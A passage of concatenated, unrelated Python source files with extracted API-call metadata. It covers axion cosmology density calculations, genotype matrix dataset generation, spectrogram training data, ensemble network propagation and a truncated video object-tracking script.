'pdfstream.io.server_message', 'io.server_message', (['"""Missing 
\'calibration_md\' in the start."""'], {}), '("Missing \'calibration_md\' in the start.")\n', (14308, 14350), True, 'import pdfstream.io as io\n'), ((15028, 15045), 'yaml.dump', 'yaml.dump', (['doc', 'f'], {}), '(doc, f)\n', (15037, 15045), False, 'import yaml\n'), ((1671, 1706), 'pdfstream.callbacks.from_descriptor.yield_1d_array', 'fd.yield_1d_array', (["doc['data_keys']"], {}), "(doc['data_keys'])\n", (1688, 1706), True, 'import pdfstream.callbacks.from_descriptor as fd\n'), ((11149, 11192), 'bluesky.callbacks.best_effort.LivePlot', 'LivePlot', (['self.y'], {'ax': 'self.ax'}), '(self.y, ax=self.ax, **self.kwargs)\n', (11157, 11192), False, 'from bluesky.callbacks.best_effort import LivePlot, LiveScatter\n'), ((13595, 13610), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (13599, 13610), False, 'from pathlib import Path\n'), ((14646, 14661), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (14650, 14661), False, 'from pathlib import Path\n')] |
import scipy.integrate as integrate
import numpy as np
import numpy.random as rd
from fractions import *
import scipy as sp
import sys
def axionphi(y, N):
    """Return the total field value and field derivative summed over fields.

    Columns 0, 3, 6, ... of ``y`` (excluding the final column) hold the
    field values; columns 1, 4, 7, ... hold the field derivatives.  ``N``
    is unused but kept for interface compatibility.
    """
    fields = y[:, 0:-1:3]
    derivs = y[:, 1::3]
    return fields.sum(axis=-1), derivs.sum(axis=1)
def dense(rhol,rho_m0,rho_r0,rho_b0,N,y,n,t,ma_array):
    """Build dense arrays of component energy densities and density fractions
    from the integrated solution ``y``.

    Assumed layout (TODO confirm against caller): ``y`` has one (phi, phid,
    rho) column triple per axion field and the scale factor in the last
    column; ``rhol`` is the constant Lambda density; ``rho_m0``/``rho_r0``/
    ``rho_b0`` are present-day densities; ``N`` time steps, ``n`` fields,
    ``t`` the time grid (only its length is used), ``ma_array`` the masses.
    Returns densities, Omega fractions, the Hubble rate H and the
    dark-energy/dark-matter split of the axion density.
    """
    rhom=[]
    rhor=[]
    rhob=[]
    # Total axion energy density: every third column starting at index 2.
    rhoa = np.sum(y[:,2::3][:],axis=-1)
    for i in range(N):
        # Matter dilutes as a**-3; radiation-like components as a**-4.
        rhom.append(rho_m0/y[:,-1][i]**3.)
        rhor.append(rho_r0/y[:,-1][i]**4.)
        # NOTE(review): rho_b scales as a**-4 here although baryons usually
        # dilute as a**-3 -- confirm this is intentional.
        rhob.append(rho_b0/y[:,-1][i]**4.)
    rholl = [rhol]*N
    rhom = np.array(rhom)
    rhol = np.array(rhol)
    rhor = np.array(rhor)
    rhoa = np.array(rhoa)
    rhob = np.array(rhob)
    rhosum = rhom+rhol+rhor+rhoa+rhob
    # Density fractions Omega_x = rho_x / rho_total.
    omegar = rhor/rhosum
    omegam = rhom/rhosum
    omegaa = rhoa/rhosum
    omegal = rhol/rhosum
    omegab = rhob/rhosum
    # Hubble rate from the Friedmann equation; only the first len(t) entries.
    H = (1.0/np.sqrt(3.0))*np.sqrt(rhosum[0:len(t)])
    rhoo=[]
    rhon=[]
    for ii in range (N):
        rhoa_de = 0
        rhoa_dm = 0
        rhoa_de2 = 0
        rhoa_dm2 = 0
        for j in range (n):
            # Split fields into dark-energy-like (mass below ~sqrt(3)H,
            # still frozen) and dark-matter-like (oscillating) contributions.
            if 3/np.sqrt(3)*np.sqrt(rhom[ii]+rhor[ii]+rhol+rhoa[ii])>ma_array[j]:
                rhoa_de = rhoa_de + y[ii,2::3][j]
            else:
                rhoa_dm = rhoa_dm + y[ii,2::3][j]
        rhoo.append(rhoa_dm)
        rhon.append(rhoa_de)
        for j in range (n):
            # Same split, but taking densities at the final time y[-1].
            # NOTE(review): the accumulators add onto rhoa_de/rhoa_dm rather
            # than rhoa_de2/rhoa_dm2, so only the last matching j contributes
            # to the *2 totals -- looks like a bug; confirm intent.
            if 3/np.sqrt(3)*np.sqrt(rhom[ii]+rhor[ii]+rhol+rhoa[ii])>ma_array[j]:
                rhoa_de2 = rhoa_de + y[-1,2::3][j]
            else:
                rhoa_dm2 = rhoa_dm + y[-1,2::3][j]
    # Present-day (final-time) dark-energy and dark-matter fractions.
    ODE = (rhoa_de2/rhosum[-1])
    ODM = (rhoa_dm2/rhosum[-1])
    return rhoa,rhom,rhor,rholl,rhob,rhosum,omegar,omegam,omegaa,omegal,omegab,H,rhoo,rhon,ODE,ODM,
def pressure(y,ma_array,N,n,rhom,rhol,rhor,rhoa,rhosum):
    """Compute the axion pressure, the total pressure, the axion equation of
    state w, the scale factor, the acceleration and the redshift along the
    solution ``y``.  Inputs follow the layout produced by ``dense``.
    """
    # Per-field pressure P = 0.5*phid**2 - 0.5*m**2*phi**2, evaluated only
    # up to the field's last zero crossing; after that the oscillating
    # field's (time-averaged) pressure is left at zero.
    Parray = np.zeros((N,n))
    for i in range(n):
        field=y[:,3*i]
        # Indices where the field changes sign.
        zero_crossings = np.where(np.diff(np.sign(field)))[0]
        if np.size(zero_crossings)==0:
            last_zero=N
        else:
            last_zero=zero_crossings[-1]
        for j in range(last_zero):
            Parray[j,i]=0.5*y[j,3*i+1]**2.-0.5*ma_array[i]**2.*field[j]**2.
    P=np.sum(Parray,axis=1)
    # Equation-of-state pressures: w=0 (matter), w=1/3 (radiation), w=-1 (Lambda).
    phom = np.array(rhom)*0.
    phor = np.array(rhor)*1./3.
    phol = np.array(rhol)*-1.
    Psum = phol+phor+phom+P
    # Axion equation of state.
    w = P/rhoa
    a=y[:,-1][0:N]
    add=[]
    for ii in range(N):
        # Acceleration equation: a'' ~ -(a/3)*(rho + 3P).
        add.append(-a[ii]/3*(rhosum[ii]+3*Psum[ii]))
    # Redshift z = 1/a - 1.
    z = 1.0/y[:,-1][0:N] - 1
    if z[-1]<0:
        # First index where z goes negative, i.e. where a crosses 1 ("today").
        zind = (next(idx for idx, value in enumerate(z) if value < 0.0))
    else:
        zind =-1
    return P,Psum,w,a,add,z,zind
| [
"numpy.size",
"numpy.sum",
"numpy.zeros",
"numpy.array",
"numpy.sign",
"numpy.sqrt"
] | [((162, 194), 'numpy.sum', 'np.sum', (['y[:, 0:-1:3][:]'], {'axis': '(-1)'}), '(y[:, 0:-1:3][:], axis=-1)\n', (168, 194), True, 'import numpy as np\n'), ((201, 230), 'numpy.sum', 'np.sum', (['y[:, 1::3][:]'], {'axis': '(1)'}), '(y[:, 1::3][:], axis=1)\n', (207, 230), True, 'import numpy as np\n'), ((338, 368), 'numpy.sum', 'np.sum', (['y[:, 2::3][:]'], {'axis': '(-1)'}), '(y[:, 2::3][:], axis=-1)\n', (344, 368), True, 'import numpy as np\n'), ((525, 539), 'numpy.array', 'np.array', (['rhom'], {}), '(rhom)\n', (533, 539), True, 'import numpy as np\n'), ((548, 562), 'numpy.array', 'np.array', (['rhol'], {}), '(rhol)\n', (556, 562), True, 'import numpy as np\n'), ((571, 585), 'numpy.array', 'np.array', (['rhor'], {}), '(rhor)\n', (579, 585), True, 'import numpy as np\n'), ((594, 608), 'numpy.array', 'np.array', (['rhoa'], {}), '(rhoa)\n', (602, 608), True, 'import numpy as np\n'), ((617, 631), 'numpy.array', 'np.array', (['rhob'], {}), '(rhob)\n', (625, 631), True, 'import numpy as np\n'), ((1574, 1590), 'numpy.zeros', 'np.zeros', (['(N, n)'], {}), '((N, n))\n', (1582, 1590), True, 'import numpy as np\n'), ((1871, 1893), 'numpy.sum', 'np.sum', (['Parray'], {'axis': '(1)'}), '(Parray, axis=1)\n', (1877, 1893), True, 'import numpy as np\n'), ((1902, 1916), 'numpy.array', 'np.array', (['rhom'], {}), '(rhom)\n', (1910, 1916), True, 'import numpy as np\n'), ((1957, 1971), 'numpy.array', 'np.array', (['rhol'], {}), '(rhol)\n', (1965, 1971), True, 'import numpy as np\n'), ((789, 801), 'numpy.sqrt', 'np.sqrt', (['(3.0)'], {}), '(3.0)\n', (796, 801), True, 'import numpy as np\n'), ((1689, 1712), 'numpy.size', 'np.size', (['zero_crossings'], {}), '(zero_crossings)\n', (1696, 1712), True, 'import numpy as np\n'), ((1928, 1942), 'numpy.array', 'np.array', (['rhor'], {}), '(rhor)\n', (1936, 1942), True, 'import numpy as np\n'), ((1195, 1241), 'numpy.sqrt', 'np.sqrt', (['(rhom[ii] + rhor[ii] + rhol + rhoa[ii])'], {}), '(rhom[ii] + rhor[ii] + rhol + rhoa[ii])\n', (1202, 1241), 
True, 'import numpy as np\n'), ((970, 1016), 'numpy.sqrt', 'np.sqrt', (['(rhom[ii] + rhor[ii] + rhol + rhoa[ii])'], {}), '(rhom[ii] + rhor[ii] + rhol + rhoa[ii])\n', (977, 1016), True, 'import numpy as np\n'), ((1184, 1194), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (1191, 1194), True, 'import numpy as np\n'), ((1664, 1678), 'numpy.sign', 'np.sign', (['field'], {}), '(field)\n', (1671, 1678), True, 'import numpy as np\n'), ((959, 969), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (966, 969), True, 'import numpy as np\n')] |
import os
import h5py
from copy import deepcopy
import numpy as np
import subprocess
import itertools
class DataSet(object):
    """Generate pairs of conflict-free ("pure") and noisy binary genotype
    matrices via the ``ms`` coalescent simulator and manage their HDF5
    (de)serialization.

    ``config`` is assumed to provide: nCells, nMuts, alpha (false-positive
    rate), beta (false-negative rate), ms_dir, h5_dir, lexSort, nTrain and
    nTest -- TODO confirm against the config definition.
    """
    def __init__(self, config):
        self.config = config

    def count3gametes(self, matrix):
        """Count three-gamete-rule violations over all ordered column pairs
        of ``matrix`` (nCells x nMuts); zero means conflict-free."""
        columnPairs = list(itertools.permutations(range(self.config.nMuts), 2))
        nColumnPairs = len(columnPairs)
        columnReplicationList = np.array(columnPairs).reshape(-1)
        # Stack every ordered column pair as a (nColumnPairs, 2, nCells) array.
        replicatedColumns = matrix[:, columnReplicationList].transpose()
        x = replicatedColumns.reshape((nColumnPairs, 2, self.config.nCells), order="A")
        # Row counts of the (0,1), (1,0) and (1,1) patterns for each pair.
        col10 = np.count_nonzero( x[:,0,:]<x[:,1,:] , axis = 1)
        col01 = np.count_nonzero( x[:,0,:]>x[:,1,:] , axis = 1)
        col11 = np.count_nonzero( (x[:,0,:]+x[:,1,:]==2), axis = 1)
        # A column pair violates the rule only if all three patterns occur.
        eachColPair = col10 * col01 * col11
        return np.sum(eachColPair)

    def ms(self, nMats):
        """Simulate ``nMats`` conflict-free matrices by shelling out to ms."""
        matrices = np.zeros((nMats, self.config.nCells, self.config.nMuts), dtype = np.int8)
        cmd = "{ms_dir}/ms {nCells} 1 -s {nMuts} | tail -n {nCells}".format(ms_dir = self.config.ms_dir, nCells = self.config.nCells, nMuts = self.config.nMuts)
        for i in range(nMats):
            out = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell = True)
            out = out.decode("utf-8").splitlines()
            matrices[i,:,:] = np.array([list(q) for q in out]).astype(int) # Original matrix
        return matrices

    def pure_noisy(self, nMats):
        """Return (pure, noisy) matrix lists: each pure ms matrix is perturbed
        with false positives (rate alpha) and false negatives (rate beta)
        until the noisy copy violates the three-gamete rule, up to a
        nCells*nMuts retry cap."""
        matrices = self.ms(nMats)
        matrices_n = []
        matrices_p = []
        for i in range(np.shape(matrices)[0]):
            v = 0
            matrix = deepcopy(matrices[i,:,:].reshape(1, -1))
            # Re-draw the noise until a three-gamete conflict appears.
            while ((self.count3gametes(matrix.reshape(self.config.nCells, self.config.nMuts)) == 0) and (v < self.config.nCells*self.config.nMuts)):
                # Start from a fresh copy of the pure matrix each attempt.
                matrix = deepcopy(matrices[i,:,:].reshape(1, -1))
                Zs = np.where(matrix == 0)[1]
                s_fp = np.random.choice([True, False], (1, len(Zs)), p = [self.config.alpha, 1 - self.config.alpha]) # must be flipped from 0 to 1
                Os = np.where(matrix == 1)[1]
                s_fn = np.random.choice([True, False], (1, len(Os)), p = [self.config.beta, 1 - self.config.beta]) # must be flipped from 1 to 0
                matrix[0, Zs[np.squeeze(s_fp)]] = 1
                matrix[0, Os[np.squeeze(s_fn)]] = 0
                v += 1
            matrices_n.append(matrix.reshape(self.config.nCells, self.config.nMuts))
            matrices_p.append(matrices[i,:,:])
        return matrices_p, matrices_n

    # shuffling rows and columns
    def permute(self, m):
        """Return ``m`` with rows and columns independently shuffled."""
        assert len(m.shape) == 2
        rowPermu = np.random.permutation(m.shape[0])
        colPermu = np.random.permutation(m.shape[1])
        return m[rowPermu, :][:, colPermu]

    def create_data(self, nMats):
        """Build a shuffled dataset of noisy (label 1) and pure (label 0)
        matrices; columns are lexicographically sorted or randomly permuted
        depending on config.lexSort."""
        m_p, m_n = self.pure_noisy(nMats)
        inps_p = np.asarray(m_p)
        inps_n = np.asarray(m_n)
        for i in range(nMats):
            if self.config.lexSort == True:
                inps_p[i,:,:] = inps_p[i, :, np.lexsort(inps_p[i, :, :])]
                inps_n[i,:,:] = inps_n[i, :, np.lexsort(inps_n[i, :, :])]
            else:
                inps_p[i,:,:] = self.permute(inps_p[i,:,:])
                inps_n[i,:,:] = self.permute(inps_n[i,:,:])
        l_n = np.ones((nMats, 1), dtype = np.int8)
        l_p = np.zeros((nMats, 1), dtype = np.int8)
        m = np.concatenate((inps_n, inps_p), axis = 0) # matrices
        l = np.concatenate((l_n, l_p), axis = 0) # labels
        # Shuffle matrices and labels with the same permutation.
        Permu = np.random.permutation(m.shape[0])
        m = m[Permu, :, :]
        l = l[Permu, :]
        return m, l

    def data(self, train):
        """Return (matrices, labels) sized for the train or test split."""
        if train == True:
            m, l = self.create_data(self.config.nTrain)
        else:
            m, l = self.create_data(self.config.nTest)
        return m, l

    def saveDataSet(self, X, y, fileName = None):
        """Write arrays X and y to an HDF5 file under config.h5_dir."""
        if not fileName:
            fileName = f"dataset_{X.shape}_{y.shape}.h5"
        fileAddress = os.path.join(self.config.h5_dir, fileName)
        h5f = h5py.File(fileAddress, 'w')
        h5f.create_dataset('X', data=X)
        h5f.create_dataset('y', data=y)
        h5f.close()

    def loadDataSet(self, fileName):
        """Read arrays X and y back from an HDF5 file under config.h5_dir."""
        fileAddress = os.path.join(self.config.h5_dir, fileName)
        assert(os.path.exists(fileAddress))
        h5f = h5py.File(fileAddress, 'r')
        X = h5f['X'][:]
        y = h5f['y'][:]
        h5f.close()
        return X, y
| [
"h5py.File",
"numpy.count_nonzero",
"numpy.sum",
"numpy.lexsort",
"numpy.asarray",
"subprocess.check_output",
"numpy.zeros",
"numpy.ones",
"os.path.exists",
"numpy.shape",
"numpy.where",
"numpy.array",
"numpy.random.permutation",
"numpy.squeeze",
"os.path.join",
"numpy.concatenate"
] | [((591, 640), 'numpy.count_nonzero', 'np.count_nonzero', (['(x[:, 0, :] < x[:, 1, :])'], {'axis': '(1)'}), '(x[:, 0, :] < x[:, 1, :], axis=1)\n', (607, 640), True, 'import numpy as np\n'), ((659, 708), 'numpy.count_nonzero', 'np.count_nonzero', (['(x[:, 0, :] > x[:, 1, :])'], {'axis': '(1)'}), '(x[:, 0, :] > x[:, 1, :], axis=1)\n', (675, 708), True, 'import numpy as np\n'), ((727, 781), 'numpy.count_nonzero', 'np.count_nonzero', (['(x[:, 0, :] + x[:, 1, :] == 2)'], {'axis': '(1)'}), '(x[:, 0, :] + x[:, 1, :] == 2, axis=1)\n', (743, 781), True, 'import numpy as np\n'), ((838, 857), 'numpy.sum', 'np.sum', (['eachColPair'], {}), '(eachColPair)\n', (844, 857), True, 'import numpy as np\n'), ((900, 971), 'numpy.zeros', 'np.zeros', (['(nMats, self.config.nCells, self.config.nMuts)'], {'dtype': 'np.int8'}), '((nMats, self.config.nCells, self.config.nMuts), dtype=np.int8)\n', (908, 971), True, 'import numpy as np\n'), ((2616, 2649), 'numpy.random.permutation', 'np.random.permutation', (['m.shape[0]'], {}), '(m.shape[0])\n', (2637, 2649), True, 'import numpy as np\n'), ((2669, 2702), 'numpy.random.permutation', 'np.random.permutation', (['m.shape[1]'], {}), '(m.shape[1])\n', (2690, 2702), True, 'import numpy as np\n'), ((2840, 2855), 'numpy.asarray', 'np.asarray', (['m_p'], {}), '(m_p)\n', (2850, 2855), True, 'import numpy as np\n'), ((2873, 2888), 'numpy.asarray', 'np.asarray', (['m_n'], {}), '(m_n)\n', (2883, 2888), True, 'import numpy as np\n'), ((3266, 3300), 'numpy.ones', 'np.ones', (['(nMats, 1)'], {'dtype': 'np.int8'}), '((nMats, 1), dtype=np.int8)\n', (3273, 3300), True, 'import numpy as np\n'), ((3317, 3352), 'numpy.zeros', 'np.zeros', (['(nMats, 1)'], {'dtype': 'np.int8'}), '((nMats, 1), dtype=np.int8)\n', (3325, 3352), True, 'import numpy as np\n'), ((3367, 3407), 'numpy.concatenate', 'np.concatenate', (['(inps_n, inps_p)'], {'axis': '(0)'}), '((inps_n, inps_p), axis=0)\n', (3381, 3407), True, 'import numpy as np\n'), ((3434, 3468), 'numpy.concatenate', 
'np.concatenate', (['(l_n, l_p)'], {'axis': '(0)'}), '((l_n, l_p), axis=0)\n', (3448, 3468), True, 'import numpy as np\n'), ((3497, 3530), 'numpy.random.permutation', 'np.random.permutation', (['m.shape[0]'], {}), '(m.shape[0])\n', (3518, 3530), True, 'import numpy as np\n'), ((3938, 3980), 'os.path.join', 'os.path.join', (['self.config.h5_dir', 'fileName'], {}), '(self.config.h5_dir, fileName)\n', (3950, 3980), False, 'import os\n'), ((4024, 4051), 'h5py.File', 'h5py.File', (['fileAddress', '"""w"""'], {}), "(fileAddress, 'w')\n", (4033, 4051), False, 'import h5py\n'), ((4212, 4254), 'os.path.join', 'os.path.join', (['self.config.h5_dir', 'fileName'], {}), '(self.config.h5_dir, fileName)\n', (4224, 4254), False, 'import os\n'), ((4270, 4297), 'os.path.exists', 'os.path.exists', (['fileAddress'], {}), '(fileAddress)\n', (4284, 4297), False, 'import os\n'), ((4313, 4340), 'h5py.File', 'h5py.File', (['fileAddress', '"""r"""'], {}), "(fileAddress, 'r')\n", (4322, 4340), False, 'import h5py\n'), ((1175, 1241), 'subprocess.check_output', 'subprocess.check_output', (['cmd'], {'stderr': 'subprocess.STDOUT', 'shell': '(True)'}), '(cmd, stderr=subprocess.STDOUT, shell=True)\n', (1198, 1241), False, 'import subprocess\n'), ((380, 401), 'numpy.array', 'np.array', (['columnPairs'], {}), '(columnPairs)\n', (388, 401), True, 'import numpy as np\n'), ((1541, 1559), 'numpy.shape', 'np.shape', (['matrices'], {}), '(matrices)\n', (1549, 1559), True, 'import numpy as np\n'), ((1866, 1887), 'numpy.where', 'np.where', (['(matrix == 0)'], {}), '(matrix == 0)\n', (1874, 1887), True, 'import numpy as np\n'), ((2055, 2076), 'numpy.where', 'np.where', (['(matrix == 1)'], {}), '(matrix == 1)\n', (2063, 2076), True, 'import numpy as np\n'), ((3009, 3036), 'numpy.lexsort', 'np.lexsort', (['inps_p[i, :, :]'], {}), '(inps_p[i, :, :])\n', (3019, 3036), True, 'import numpy as np\n'), ((3083, 3110), 'numpy.lexsort', 'np.lexsort', (['inps_n[i, :, :]'], {}), '(inps_n[i, :, :])\n', (3093, 3110), True, 
'import numpy as np\n'), ((2250, 2266), 'numpy.squeeze', 'np.squeeze', (['s_fp'], {}), '(s_fp)\n', (2260, 2266), True, 'import numpy as np\n'), ((2299, 2315), 'numpy.squeeze', 'np.squeeze', (['s_fn'], {}), '(s_fn)\n', (2309, 2315), True, 'import numpy as np\n')] |
import numpy as np
from data.baseDataset import BaseDataset
__author__ = 'Andres'
class TrainDataset(BaseDataset):
    """Dataset that serves random spectrogram windows from the training split.

    The training split is the first 80% of each audio file's samples; every
    item access draws ``examples_per_file`` random windows from one file.
    """
    def _saveNewFile(self, name, audio, spectrogram):
        # Cache the spectrogram alongside a zeroed usage counter.
        self._loaded_files[name] = [0, spectrogram]

    def _sliceAudio(self, audio):
        # Keep only the first 80% of the samples for training.
        cutoff = int(0.8 * audio.shape[0])
        return audio[:cutoff]

    def __getitem__(self, unused_index):
        chosen = self._selectFile()
        spec = self._loaded_files[chosen][1]
        self._usedFilename(chosen)
        # One random window start per example, drawn in a single call.
        offsets = np.random.randint(0, spec.shape[1] - self._window_size, self._examples_per_file)
        n_bins = self._audio_loader.windowLength() // 2 + 1
        batch = np.zeros([self._examples_per_file, n_bins, self._window_size], dtype=np.float64)
        for slot, offset in enumerate(offsets):
            batch[slot] = spec[:, offset:offset + self._window_size]
        # Drop the last frequency bin.
        return batch[:, :-1]
if __name__ == '__main__':
    # Smoke test: build a dataset, fetch one item and iterate batches.
    import torch

    examples_per_file = 16
    dataset = TrainDataset("", window_size=512, examples_per_file=examples_per_file)
    print(dataset[1].shape)

    loader = torch.utils.data.DataLoader(dataset, batch_size=128 // 16, shuffle=True)
    for batch in loader:
        print(batch.shape)
        # Flatten the per-file example dimension into the batch dimension.
        reshaped = batch.view(128, 1, 256, 128 * 4)
        print(reshaped.shape)
| [
"numpy.random.randint",
"torch.utils.data.DataLoader"
] | [((1095, 1167), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'batch_size': '(128 // 16)', 'shuffle': '(True)'}), '(dataset, batch_size=128 // 16, shuffle=True)\n', (1122, 1167), False, 'import torch\n'), ((496, 588), 'numpy.random.randint', 'np.random.randint', (['(0)', '(spectrogram.shape[1] - self._window_size)', 'self._examples_per_file'], {}), '(0, spectrogram.shape[1] - self._window_size, self.\n _examples_per_file)\n', (513, 588), True, 'import numpy as np\n')] |
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Class for fwd propagating pre-trained nets in ensemble, one step at a time
- Assume that the same Reshaper is used to process the data, but not
necessarily on the same data (i.e., possibly different whitening matrix
and/or different id_idx orders)
- Hence, receive and return data for all nets separately
"""
from __future__ import absolute_import, division, print_function
import numpy as np
from net import Net
from collections import OrderedDict
class Ensemble():
    def __init__(self, workspaces, batch_size, indices):
        """
        Load pre-trained nets from files and prepare for fwd propagation
            workspaces  list [workspace_0, ..., workspace_(N-1)]
            batch_size  int  > 0
            indices     list [batch_idx_list_0, ..., batch_idx_list_(N-1)]
                where
                    batch_idx_list = [id_idx_0, ..., id_idx_(B-1)]
                is batch-dimension id_idx order in vec_in for run_one_step
        """
        self._n_nets = len(workspaces)
        self._batch_size = batch_size
        assert self._n_nets > 0 and batch_size > 0
        # Per-net id_idx arrays, each of length batch_size.
        self._id_idx_nb = []
        assert len(indices) == self._n_nets
        for indice in indices:
            assert len(indice) == batch_size
            self._id_idx_nb.append(np.array(indice).astype('int32'))
        options = OrderedDict()
        options['step_size'] = 1 # can generalize to more than 1 if needed
        options['batch_size'] = batch_size
        self._input_dim = 0 # set below
        self._target_dim = 0 # set below
        self._nets = []
        self._props = [] # fwd propagators
        for workspace in workspaces:
            self._nets.append(Net(options, None, workspace))
            self._props.append(self._nets[-1].compile_f_fwd_propagate())
            # All nets in the ensemble must share the same dimensions.
            if len(self._nets) == 1:
                self._input_dim, self._target_dim = self._nets[-1].dimensions()
            else:
                input_dim, target_dim = self._nets[-1].dimensions()
                assert self._input_dim == input_dim and \
                       self._target_dim == target_dim
        self.reset()

    def reset(self):
        """
        Rewind to t = 0
        """
        # Time counter, one entry per batch element (all advance together).
        self._time_tb = np.zeros((1, self._batch_size)).astype('float32')

    def run_one_step(self, vec_in):
        """
        Inputs:
            vec_in   np.ndarray [n_nets][batch_size][input_dim]  (flattened)
        Returns:
            vec_out  np.ndarray [n_nets][batch_size][target_dim] (flattened)
        """
        input_nbi = vec_in.astype('float32').reshape \
                    ((self._n_nets, self._batch_size, self._input_dim ))
        output_nbi = np.zeros \
                     ((self._n_nets, self._batch_size, self._target_dim)) \
                     .astype('float32')
        for i, f in enumerate(self._props):
            # f(input_tbi, time_tb, id_idx_tb) -> [output_tbi]
            output_nbi[i] = f(input_nbi[i][None, :, :], self._time_tb,
                              self._id_idx_nb[i][None, :])[0] # _bi = _1bi
        # Advance the internal time for the next step.
        self._time_tb[0] += 1.
        return output_nbi.reshape(-1)
| [
"collections.OrderedDict",
"net.Net",
"numpy.zeros",
"numpy.array"
] | [((1923, 1936), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1934, 1936), False, 'from collections import OrderedDict\n'), ((2274, 2303), 'net.Net', 'Net', (['options', 'None', 'workspace'], {}), '(options, None, workspace)\n', (2277, 2303), False, 'from net import Net\n'), ((2815, 2846), 'numpy.zeros', 'np.zeros', (['(1, self._batch_size)'], {}), '((1, self._batch_size))\n', (2823, 2846), True, 'import numpy as np\n'), ((3272, 3332), 'numpy.zeros', 'np.zeros', (['(self._n_nets, self._batch_size, self._target_dim)'], {}), '((self._n_nets, self._batch_size, self._target_dim))\n', (3280, 3332), True, 'import numpy as np\n'), ((1870, 1886), 'numpy.array', 'np.array', (['indice'], {}), '(indice)\n', (1878, 1886), True, 'import numpy as np\n')] |
"""
CV traffic analysis
Video processing
This code creates the VideoTracker class and provides basic command line interface to
process video inputs.
"""
#-------------------------------------------------------------------------------------
# Settings
import os
import cv2
import time
import argparse
import torch
import warnings
import numpy as np
import pandas as pd
from detector import build_detector
from deep_sort import build_tracker
from utils.draw import draw_boxes
from utils.parser import get_config
from utils.log import get_logger
from utils.io import write_results
#-------------------------------------------------------------------------------------
class VideoTracker(object):
    """Run detection + DeepSORT tracking on a video file or webcam stream,
    optionally displaying frames, writing an annotated video and exporting a
    CSV of per-frame tracks.  Use as a context manager."""
    def __init__(self, cfg, args, video_path):
        self.cfg = cfg
        self.args = args
        self.video_path = video_path
        self.logger = get_logger("root")
        use_cuda = args.use_cuda and torch.cuda.is_available()
        if not use_cuda:
            warnings.warn("Running in cpu mode which maybe very slow!", UserWarning)
        if args.display:
            cv2.namedWindow("test", cv2.WINDOW_NORMAL)
            cv2.resizeWindow("test", args.display_width, args.display_height)
        if args.cam != -1:
            print("Using webcam " + str(args.cam))
            self.vdo = cv2.VideoCapture(args.cam)
        else:
            # Video-file capture is opened later, in __enter__.
            self.vdo = cv2.VideoCapture()
        self.detector = build_detector(cfg, use_cuda=use_cuda)
        self.deepsort = build_tracker(cfg, use_cuda=use_cuda)
        self.class_names = self.detector.class_names

    def __enter__(self):
        """Open the capture source and set up output paths and the writer."""
        if self.args.cam != -1:
            ret, frame = self.vdo.read()
            assert ret, "Error: Camera error"
            # NOTE(review): frame.shape is (height, width, channels), so
            # im_width/im_height look swapped here -- confirm intended.
            self.im_width = frame.shape[0]
            self.im_height = frame.shape[1]
        else:
            assert os.path.isfile(self.video_path), "Error: path not found!"
            self.vdo.open(self.video_path)
            self.im_width = int(self.vdo.get(cv2.CAP_PROP_FRAME_WIDTH))
            self.im_height = int(self.vdo.get(cv2.CAP_PROP_FRAME_HEIGHT))
            assert self.vdo.isOpened()
        if self.args.save_path:
            os.makedirs(self.args.save_path, exist_ok=True)
            # Derive output video/CSV file names from the input file name.
            def parse_file_name(path):
                in_file_name = os.path.basename(path)
                video_name = in_file_name.split('.')[0] + '.mp4'
                results_name = in_file_name.split('.')[0] + '.csv'
                return video_name, results_name
            video_output_filename, results_filename = parse_file_name(self.video_path)
            self.save_video_path = os.path.join(self.args.save_path, video_output_filename)
            self.save_results_path = os.path.join(self.args.save_path, results_filename)
            # Create the annotated-video writer (fixed 20 fps).
            if (os.path.exists(self.args.save_path) & (not self.args.no_export)):
                fourcc = cv2.VideoWriter_fourcc(*'avc1')
                self.writer = cv2.VideoWriter(self.save_video_path, fourcc, 20, (self.im_width, self.im_height))
            # logging
            self.logger.info("Saving results to {}".format(self.save_results_path))
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        # Surface any exception raised inside the with-block, then let it
        # propagate (nothing is suppressed).
        if exc_type:
            print(exc_type, exc_value, exc_traceback)

    def run(self):
        """Process the video frame by frame: detect, track, draw, export."""
        # Base variables
        idx_frame = 0
        # Results accumulator: one row per track per frame, 7 columns
        # (frame, xi, yi, xj, yj, obj_id, class).
        self.results_array = np.empty(shape = (0,7))
        # Loop over video frames
        while self.vdo.grab():
            idx_frame += 1
            # Skip frames according to the configured sampling interval.
            if idx_frame % self.args.frame_interval:
                continue
            start = time.time()
            _, ori_im = self.vdo.retrieve()
            im = cv2.cvtColor(ori_im, cv2.COLOR_BGR2RGB)
            # Detection on each frame
            detections_t = self.detector(im)
            bbox_xywh, cls_conf, cls_ids = detections_t[0], detections_t[1], detections_t[2]
            # Filter detection classes to only relevant cases.
            # This is mostly to remove noise as it doesn't affect performance.
            keep_classes = [0, # person
                            1, # bicycle
                            2, # car
                            3, # motorbike
                            5, # bus
                            7] # truck
            mask = np.isin(cls_ids, keep_classes)
            # Process detections
            bbox_xywh = bbox_xywh[mask]
            # Bbox dilation just in case bbox too small
            bbox_xywh[:, 3:] *= 1.2
            cls_conf = cls_conf[mask]
            cls_ids = cls_ids[mask]
            # Update tracking
            outputs = self.deepsort.update(bbox_xywh, cls_conf, cls_ids, im)
            # Draw boxes for visualization
            if len(outputs) > 0:
                bbox_tlwh = []
                bbox_xyxy = outputs[:, :4].astype(int)
                identities = outputs[:, 4].astype(int)
                ori_im = draw_boxes(ori_im, bbox_xyxy, identities)
                for bb_xyxy in bbox_xyxy:
                    bbox_tlwh.append(self.deepsort._xyxy_to_tlwh(bb_xyxy))
            end = time.time()
            if self.args.display:
                cv2.imshow("test", ori_im)
                cv2.waitKey(1)
            if (os.path.exists(self.args.save_path) & (not self.args.no_export)):
